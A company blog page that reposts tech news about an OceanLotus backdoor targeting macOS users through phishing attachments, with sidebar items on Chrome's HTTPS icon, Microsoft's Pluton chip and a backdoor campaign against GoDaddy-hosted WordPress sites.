Snynet Solution Logo
MON - SUN: 10 AM - 6 PM
+60 11 5624 8319

Blog

MacOS users targeted with dangerous new malware

Image Description

Cyber threats are increasingly targeting macOS users and new research from Trend Micro has discovered that a new malware variant is currently being deployed online by a nation-state-backed hacking operation.

The firm's security researchers believe that the Vietnamese hacking group OceanLotus, known as APT32, is behind this new malware campaign due to “similarities in dynamic behavior and code” with previous samples collected from the group.

In the past, OceanLotus has targeted foreign organizations working in Vietnam from a variety of different industries including media, research and construction. While the group's motivations aren't entirely clear, it is believed that the group conducts espionage on foreign firms to help Vietnamese-owned companies.

The backdoor recently discovered by Trend Micro allows OceanLotus to spy on compromised machines and steal confidential information and sensitive business documents from macOS users.

OceanLotus attacks

The recent series of attacks launched by the OceanLotus group begin with a phishing email that tries to encourage users to run a Zip file disguised as a Word document which is capable of avoiding detection by antivirus software through the use of special characters.

The attack could be discovered by users who realize that a Microsoft Word document doesn't open when they click on the email's attachment. However, by this time, the initial payload is already in the process of changing access permissions in order to load a second-stage payload that prompts a user to install a third and final payload. This third-stage payload then downloads the backdoor onto a user's system.

Just like older versions of OceanLotus' malware, this new variant tries to collect system information and create a backdoor that allows the group to spy on a user and download files from their system. The malware can also be used to upload additional malicious software to the system if required and Trend Micro believes that the malware is still actively being developed by the group.

In order to prevent falling victim to this latest campaign, Trend Micro recommends that macOS users remain vigilant when it comes to clicking on links or downloading attachments from emails sent by unknown sources. At the same time, users should apply the latest security patches to prevent OceanLotus and other hacking groups from exploiting known vulnerabilities.

Via ZDNet

Date

01 Dec 2020

Sources


Share


Other Blog

  • Google Chrome is making a small but vital change in how it keeps you secure

    Chrome will no longer show a lock icon when visiting sites using HTTPS while sites using HTTP will still appear as “Not secure”.

    Read More
  • Microsoft's new security chip will not lock devices to Windows 11 as feared

    New PCs released this year that ship with Microsoft's Pluton security chip will still be able to run other operating systems besides Windows 11.

    While it was initially feared by the open-source community and others that Pluton would serve as a means to lock equipment to the latest version of Windows, that isn't the case at all. Instead, in addition to being able to install Linux and BSD, PC makers and even users themselves will be able to turn off the feature entirely.

    The first Windows 11 PCs with Pluton built-in were shown off at CES 2022 and Intel, AMD and Qualcomm are all planning to embed Microsoft's security chip in their latest or upcoming microprocessors.

    Pluton itself can act as a Trusted Platform Module (TPM) or as a non-TPM security coprocessor according to a new report by The Register. Essentially the new security chip will serve as a way for Microsoft to show chipmakers how it wants TPM to be present in microprocessors going forward.

    Enabled or disabled

    PC makers have the option to ship their new Windows 11 PCs with Pluton either enabled or disabled though end users will also be able to reverse this decision if they want to.

    Microsoft's Pluton design was integrated into AMD's latest Ryzen 6000 chips but users will be able to disable the security chip on machines that follow the chipmaker's reference firmware. This can be done in the company's reference BIOS.

    The Register also learned from a Lenovo spokesperson that Pluton will be disabled by default on the company's new Z13, Z16, T14, T16, T14s, P16s and X13 ThinkPads that feature Ryzen 6000-series processors. However, users will be able to enable Pluton themselves.

    Meanwhile, Intel's latest Alder Lake processors will include a Pluton-equivalent called Intel Platform Trust Technology which is a TPM 2.0 compatible component.

    We've also rounded up the best business laptops, best workstations and best mobile workstations

    Via The Register

    Read More
  • Hundreds of GoDaddy sites caught up in hacking campaign

    A new hacking campaign infecting hundreds of sites hosted by GoDaddy-hosted sites has been uncovered.

    An investigation by the Wordfence Incident Response team found more than 280 websites hosted with GoDaddy’s Managed WordPress service were infected with a backdoor.

    Among the compromised services are MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe, with a total of 298 sites found to be infected. 

    TechRadar needs you!

    We're looking at how our readers use VPNs with different devices so we can improve our content and offer better advice. This survey shouldn't take more than 60 seconds of your time, and entrants from the UK and US will have the chance to enter a draw for a £100 Amazon gift card (or equivalent in USD). Thank you for taking part.

    >> Click here to start the survey in a new window

    This unnamed backdoor, it was further explained, has been in use for at least seven years. The threat actors add it to the beginning of wp-config.php and its goal seems to be to generate spammy Google search results, including resources customized to the infected site. 

    Russian TLD

    “If a request with a cookie set to a certain base64-encoded value is sent to the site, the backdoor will download a spam link template from a command and control (C2) domain – in this case t-fish-ka[.]ru – and save it to an encoded file with a name set to the MD5 hash of the infected site’s domain,” the researchers explained. “For example, the encoded file for ‘examplesite.com’ would be named 8c14bd67a49c34807b57202eb549e461, which is a hash of that domain.”

    The C2 domain has a Russian top-level domain, but there’s nothing to indicate that this particular campaign has anything to do with Russia’s ongoing invasion of Ukraine. 

    The researchers are yet to discover how the threat actors made their way into GoDaddy’s services, speculating that it might be linked to last year’s attack on the company’s systems. In 2021, GoDaddy reported of an unknown attacker accessing its systems used to provision its Managed WordPress sites. 

    Customers of GoDaddy’s Managed WordPress platform are advised to manually analyze their site’s wp-config.php file, or run a scan with a malware detection solution, to make sure their premises are clean. 

    Those that do find something can use the instructions found on this link, to clean up their sites of any malicious code or viruses.

    Read More
  • Why android is the OS of choice for emergency services

    Emergency Services previously relying on Windows-based mobile computers are evaluating strategies to migrate to Android.

    Read More

Find Out More About Us

Want to hire best people for your project? Look no further you came to the right place!

Contact Us